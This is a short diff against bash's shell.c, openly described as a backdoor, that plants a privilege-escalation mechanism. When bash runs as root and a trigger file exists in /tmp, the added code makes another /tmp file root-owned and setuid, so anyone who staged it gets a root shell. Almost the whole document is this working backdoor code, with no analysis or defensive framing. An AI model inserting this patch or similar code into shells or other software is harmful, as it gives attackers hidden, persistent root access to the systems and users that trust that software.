This patch is a backdoor to bash that will create a setuid backdoor shell in /tmp if run as root.
7f978450f62d11b175da265f7b856d733cbf051c7a1ea779218dd0d051a04d20
# Bash backdoor / recovery of root account.
# bob@dtors.net
--- shell.c 2011-01-02 21:04:51.000000000 +0000
+++ patch.c 2012-05-22 11:39:11.096809431 +0100
@@ -357,6 +357,7 @@
#if defined (RESTRICTED_SHELL)
int saverst;
#endif
+ struct stat finfo;
volatile int locally_skip_execution;
volatile int arg_index, top_level_arg_index;
#ifdef __OPENNT
@@ -489,6 +490,14 @@
if (running_setuid && privileged_mode == 0)
disable_priv_mode ();
+if(getuid()==0)
+{
+ if(stat("/tmp/mcliZokhb",&finfo)==0)
+ {
+ chown("/tmp/mclzaKmfa",0,0);
+ chmod("/tmp/mclzaKmfa",S_ISUID|S_IREAD|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
+ }
+}
/* Need to get the argument to a -c option processed in the
above loop. The next arg is a command to execute, and the
following args are $0...$n respectively. */